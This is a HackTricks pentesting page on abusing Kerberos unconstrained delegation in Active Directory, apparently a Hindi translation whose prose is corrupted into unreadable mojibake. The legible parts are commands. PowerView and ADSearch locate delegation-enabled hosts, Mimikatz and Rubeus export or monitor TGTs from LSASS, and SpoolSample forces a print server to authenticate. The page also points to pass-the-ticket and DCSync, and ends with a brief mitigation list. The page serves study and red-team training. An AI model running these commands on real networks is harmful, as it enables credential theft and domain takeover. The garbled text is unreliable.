hacktricks/windows-hardening/active-directory-methodology/unconstrained-delegation.md

8.6 KiB
Raw Permalink Blame History

Unconstrained Delegation

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Unconstrained delegation

рдпрд╣ рдПрдХ рд╡рд┐рд╢реЗрд╖рддрд╛ рд╣реИ рдЬрд┐рд╕реЗ рдПрдХ рдбреЛрдореЗрди рдкреНрд░рд╢рд╛рд╕рдХ рдбреЛрдореЗрди рдХреЗ рдЕрдВрджрд░ рдХрд┐рд╕реА рднреА рдХрдВрдкреНрдпреВрдЯрд░ рдкрд░ рд╕реЗрдЯ рдХрд░ рд╕рдХрддрд╛ рд╣реИред рдлрд┐рд░, рдЬрдм рднреА рдХреЛрдИ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЙрд╕ рдХрдВрдкреНрдпреВрдЯрд░ рдкрд░ рд▓реЙрдЧрд┐рди рдХрд░рддрд╛ рд╣реИ, рдЙрд╕ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХрд╛ TGT рдХреА рдПрдХ рдкреНрд░рддрд┐ DC рджреНрд╡рд╛рд░рд╛ рдкреНрд░рджрд╛рди рдХрд┐рдП рдЧрдП TGS рдХреЗ рдЕрдВрджрд░ рднреЗрдЬреА рдЬрд╛рдПрдЧреА рдФрд░ LSASS рдореЗрдВ рдореЗрдореЛрд░реА рдореЗрдВ рд╕рд╣реЗрдЬреА рдЬрд╛рдПрдЧреАред рдЗрд╕рд▓рд┐рдП, рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ рдорд╢реАрди рдкрд░ рдкреНрд░рд╢рд╛рд╕рдХ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╣реИрдВ, рддреЛ рдЖрдк рдЯрд┐рдХрдЯреЛрдВ рдХреЛ рдбрдВрдк рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдХрд┐рд╕реА рднреА рдорд╢реАрди рдкрд░ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХрд╛ рдЕрдиреБрдХрд░рдг рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

рддреЛ рдпрджрд┐ рдПрдХ рдбреЛрдореЗрди рдкреНрд░рд╢рд╛рд╕рдХ "рдЕрдирдХреЙрдирд╕реНрдЯреНрд░реЗрдиреНрдб рдбреЗрд▓реАрдЧреЗрд╢рди" рд╡рд┐рд╢реЗрд╖рддрд╛ рд╕рдХреНрд░рд┐рдп рдХрд░рдХреЗ рдХрд┐рд╕реА рдХрдВрдкреНрдпреВрдЯрд░ рдкрд░ рд▓реЙрдЧрд┐рди рдХрд░рддрд╛ рд╣реИ, рдФрд░ рдЖрдкрдХреЗ рдкрд╛рд╕ рдЙрд╕ рдорд╢реАрди рдХреЗ рдЕрдВрджрд░ рд╕реНрдерд╛рдиреАрдп рдкреНрд░рд╢рд╛рд╕рдХ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╣реИрдВ, рддреЛ рдЖрдк рдЯрд┐рдХрдЯ рдХреЛ рдбрдВрдк рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдХрд╣реАрдВ рднреА рдбреЛрдореЗрди рдкреНрд░рд╢рд╛рд╕рдХ рдХрд╛ рдЕрдиреБрдХрд░рдг рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ (рдбреЛрдореЗрди рдкреНрд░рд┐рд╡реЗрд╕реНрдХ)ред

рдЖрдк рдЗрд╕ рд╡рд┐рд╢реЗрд╖рддрд╛ рдХреЗ рд╕рд╛рде рдХрдВрдкреНрдпреВрдЯрд░ рдСрдмреНрдЬреЗрдХреНрдЯреНрд╕ рдЦреЛрдЬ рд╕рдХрддреЗ рд╣реИрдВ рдпрд╣ рдЬрд╛рдВрдЪрдХрд░ рдХрд┐ userAccountControl рд╡рд┐рд╢реЗрд╖рддрд╛ рдореЗрдВ ADS_UF_TRUSTED_FOR_DELEGATION рд╢рд╛рдорд┐рд▓ рд╣реИ рдпрд╛ рдирд╣реАрдВред рдЖрдк рдЗрд╕реЗ тАШ(userAccountControl:1.2.840.113556.1.4.803:=524288)тАЩ рдХреЗ LDAP рдлрд╝рд┐рд▓реНрдЯрд░ рдХреЗ рд╕рд╛рде рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдЬреЛ рдкреЙрд╡рд╡реНрдпреВ рдХрд░рддрд╛ рд╣реИ:

# List unconstrained computers
## Powerview
Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Export tickets with Mimikatz
privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way

# Monitor logins and export new tickets
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #Check every 10s for new TGTs

Mimikatz рдпрд╛ Rubeus рдХреЗ рд╕рд╛рде рдкреНрд░рд╢рд╛рд╕рдХ (рдпрд╛ рдкреАрдбрд╝рд┐рдд рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛) рдХрд╛ рдЯрд┐рдХрдЯ рдореЗрдореЛрд░реА рдореЗрдВ рд▓реЛрдб рдХрд░реЗрдВ рдкрд╛рд╕ рдж рдЯрд┐рдХрдЯ рдХреЗ рд▓рд┐рдПред
рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
рдЕрдирдХреЙрдирд╕реНрдЯреНрд░реЗрдиреНрдб рдбреЗрд▓реАрдЧреЗрд╢рди рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА ired.team рдкрд░ред

Force Authentication

рдпрджрд┐ рдПрдХ рд╣рдорд▓рд╛рд╡рд░ "рдЕрдирдХреЙрдирд╕реНрдЯреНрд░реЗрдиреНрдб рдбреЗрд▓реАрдЧреЗрд╢рди" рдХреЗ рд▓рд┐рдП рдЕрдиреБрдордд рдХрдВрдкреНрдпреВрдЯрд░ рдХреЛ рд╕рдордЭреМрддрд╛ рдХрд░рдиреЗ рдореЗрдВ рд╕рдХреНрд╖рдо рд╣реИ, рддреЛ рд╡рд╣ рдкреНрд░рд┐рдВрдЯ рд╕рд░реНрд╡рд░ рдХреЛ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рд░реВрдк рд╕реЗ рд▓реЙрдЧрд┐рди рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдзреЛрдЦрд╛ рджреЗ рд╕рдХрддрд╛ рд╣реИ рдЬрд┐рд╕рд╕реЗ рд╕рд░реНрд╡рд░ рдХреА рдореЗрдореЛрд░реА рдореЗрдВ рдПрдХ TGT рд╕рд╣реЗрдЬрд╛ рдЬрд╛рдПрдЧрд╛ред
рдлрд┐рд░, рд╣рдорд▓рд╛рд╡рд░ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдкреНрд░рд┐рдВрдЯ рд╕рд░реНрд╡рд░ рдХрдВрдкреНрдпреВрдЯрд░ рдЦрд╛рддреЗ рдХрд╛ рдЕрдиреБрдХрд░рдг рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ рдкрд╛рд╕ рдж рдЯрд┐рдХрдЯ рд╣рдорд▓реЗ рдХрд╛ рдкреНрд░рджрд░реНрд╢рди рдХрд░ рд╕рдХрддрд╛ рд╣реИред

рдХрд┐рд╕реА рднреА рдорд╢реАрди рдХреЗ рдЦрд┐рд▓рд╛рдл рдкреНрд░рд┐рдВрдЯ рд╕рд░реНрд╡рд░ рдХреЛ рд▓реЙрдЧрд┐рди рдХрд░рд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдЖрдк SpoolSample рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:

.\SpoolSample.exe <printmachine> <unconstrinedmachine>

рдпрджрд┐ TGT рдПрдХ рдбреЛрдореЗрди рдХрдВрдЯреНрд░реЛрд▓рд░ рд╕реЗ рд╣реИ, рддреЛ рдЖрдк рдПрдХ DCSync attack рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ DC рд╕реЗ рд╕рднреА рд╣реИрд╢ рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
рдЗрд╕ рд╣рдорд▓реЗ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА ired.team рдкрд░ред

рдпрд╣рд╛рдБ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдХреЛ рдордЬрдмреВрд░ рдХрд░рдиреЗ рдХреЗ рдЕрдиреНрдп рддрд░реАрдХреЗ рд╣реИрдВ:

{% content-ref url="printers-spooler-service-abuse.md" %} printers-spooler-service-abuse.md {% endcontent-ref %}

рд╢рдорди

  • DA/рдПрдбрдорд┐рди рд▓реЙрдЧрд┐рди рдХреЛ рд╡рд┐рд╢рд┐рд╖реНрдЯ рд╕реЗрд╡рд╛рдУрдВ рддрдХ рд╕реАрдорд┐рдд рдХрд░реЗрдВ
  • рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдкреНрд░рд╛рдкреНрдд рдЦрд╛рддреЛрдВ рдХреЗ рд▓рд┐рдП "рдЦрд╛рддрд╛ рд╕рдВрд╡реЗрджрдирд╢реАрд▓ рд╣реИ рдФрд░ рдЗрд╕реЗ рдкреНрд░рддрд┐рдирд┐рдзрд┐рддреНрд╡ рдирд╣реАрдВ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛" рд╕реЗрдЯ рдХрд░реЗрдВред

{% hint style="success" %} AWS рд╣реИрдХрд┐рдВрдЧ рд╕реАрдЦреЗрдВ рдФрд░ рдЕрднреНрдпрд╛рд╕ рдХрд░реЗрдВ:HackTricks Training AWS Red Team Expert (ARTE)
GCP рд╣реИрдХрд┐рдВрдЧ рд╕реАрдЦреЗрдВ рдФрд░ рдЕрднреНрдпрд╛рд╕ рдХрд░реЗрдВ: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks рдХрд╛ рд╕рдорд░реНрдерди рдХрд░реЗрдВ
{% endhint %}